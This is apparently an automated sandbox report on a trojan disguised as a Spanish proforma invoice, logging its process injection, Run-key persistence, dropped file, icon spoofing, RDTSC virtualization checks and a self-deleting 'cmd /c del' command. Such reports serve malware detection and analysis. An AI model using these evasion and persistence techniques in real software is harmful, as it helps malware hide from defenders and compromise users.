Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003E87BC NtAllocateVirtualMemory,	12_2_003E87BC

Source: Se adjunta el pedido, proforma.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Lxtcsmeg.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Memory allocated: 72480000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Memory allocated: 72480000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Memory allocated: 72480000 page no access	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Memory allocated: 72480000 page read and write	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Memory allocated: 72481000 page read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: 72480000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: 72480000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: 72480000 page no access	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: 72480000 page read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: 72481000 page read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: 72480000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: 72480000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: 72480000 page no access	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: 72480000 page read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: 72481000 page read and write	Jump to behavior

Source: Se adjunta el pedido, proforma.exe	Virustotal: Detection: 42%
Source: Se adjunta el pedido, proforma.exe	ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe

File read: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe

Jump to behavior

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe "C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe"
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe "C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe "C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\mobsync.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe "C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe"	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\mobsync.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Lxtcsmegwxhfqoabkjaduxyckamobho[1]

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@15/35@8/3

Source: C:\Windows\explorer.exe

File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_01

Source: C:\Windows\SysWOW64\cscript.exe

Process created: C:\Windows\explorer.exe

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:

Binary string: wntdll.pdb source: mobsync.exe, cscript.exe

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_0360E3C0 push esi; retf	0_3_0360E3F2
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_0360F4F6 push dword ptr [ebp-63h]; ret	0_3_0360F53B
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03804D84 push esi; ret	0_3_03804DC6
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03805B8F push eax; retf	0_3_03805B9E
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_038053C0 push esi; iretd	0_3_038053ED
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03804BC8 push ecx; iretd	0_3_03804BE9
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03802BCA push eax; iretd	0_3_03802BCC
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03803FDE push 6540A65Bh; ret	0_3_03804018
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03801300 push ebx; retf	0_3_03801449
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03803909 push ecx; ret	0_3_03803916
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03804D09 push ebp; ret	0_3_03804D65
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03804D14 push ebp; ret	0_3_03804D65
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03805338 push ebp; ret	0_3_0380535F
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03806D3D push edx; iretd	0_3_03806D3E
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03804B40 push 00000066h; retf	0_3_03804B52
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03805D4D push eax; iretd	0_3_03805D50
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03806558 pushad ; ret	0_3_0380657A
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03804D67 push esi; ret	0_3_03804DC6
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03806096 push ebx; ret	0_3_038060C2
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03804C99 push esi; iretd	0_3_03804CE5
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_038056B6 push ss; retf	0_3_038056D2
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03805AC1 push ds; iretd	0_3_03805AC2
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_038046CE push edx; ret	0_3_038046D9
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_038014D3 push esi; retf	0_3_038014EB
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_038068DA push 6540A65Bh; ret	0_3_038068E0
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_038066DC push ebp; ret	0_3_0380670F
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_038052F6 push eax; iretd	0_3_03805337
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03806672 push cs; iretd	0_3_03806673
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_03804C7A push FFFFFFCFh; iretd	0_3_03804C8D
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_0384EF93 push es; retf	0_3_0384EF9C
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_038C27FA push eax; iretd	0_3_038C27FC

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe

File created: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Lxtcsmeg			Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Lxtcsmeg			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Show sources

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon (532).png

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\mobsync.exe	RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mobsync.exe	RDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 00000000003D8604 second address: 00000000003D860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 00000000003D899E second address: 00000000003D89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\logagent.exe	RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\logagent.exe	RDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 5_2_04A86DE6 rdtsc

5_2_04A86DE6

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 5_2_04A86DE6 rdtsc

5_2_04A86DE6

Source: C:\Windows\SysWOW64\mobsync.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5849B mov eax, dword ptr fs:[00000030h]	5_2_04A5849B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B014FB mov eax, dword ptr fs:[00000030h]	5_2_04B014FB
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6CF0 mov eax, dword ptr fs:[00000030h]	5_2_04AC6CF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6CF0 mov eax, dword ptr fs:[00000030h]	5_2_04AC6CF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6CF0 mov eax, dword ptr fs:[00000030h]	5_2_04AC6CF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B18CD6 mov eax, dword ptr fs:[00000030h]	5_2_04B18CD6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7BC2C mov eax, dword ptr fs:[00000030h]	5_2_04A7BC2C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6C0A mov eax, dword ptr fs:[00000030h]	5_2_04AC6C0A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6C0A mov eax, dword ptr fs:[00000030h]	5_2_04AC6C0A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6C0A mov eax, dword ptr fs:[00000030h]	5_2_04AC6C0A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC6C0A mov eax, dword ptr fs:[00000030h]	5_2_04AC6C0A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01C06 mov eax, dword ptr fs:[00000030h]	5_2_04B01C06
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B1740D mov eax, dword ptr fs:[00000030h]	5_2_04B1740D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B1740D mov eax, dword ptr fs:[00000030h]	5_2_04B1740D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B1740D mov eax, dword ptr fs:[00000030h]	5_2_04B1740D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6746D mov eax, dword ptr fs:[00000030h]	5_2_04A6746D
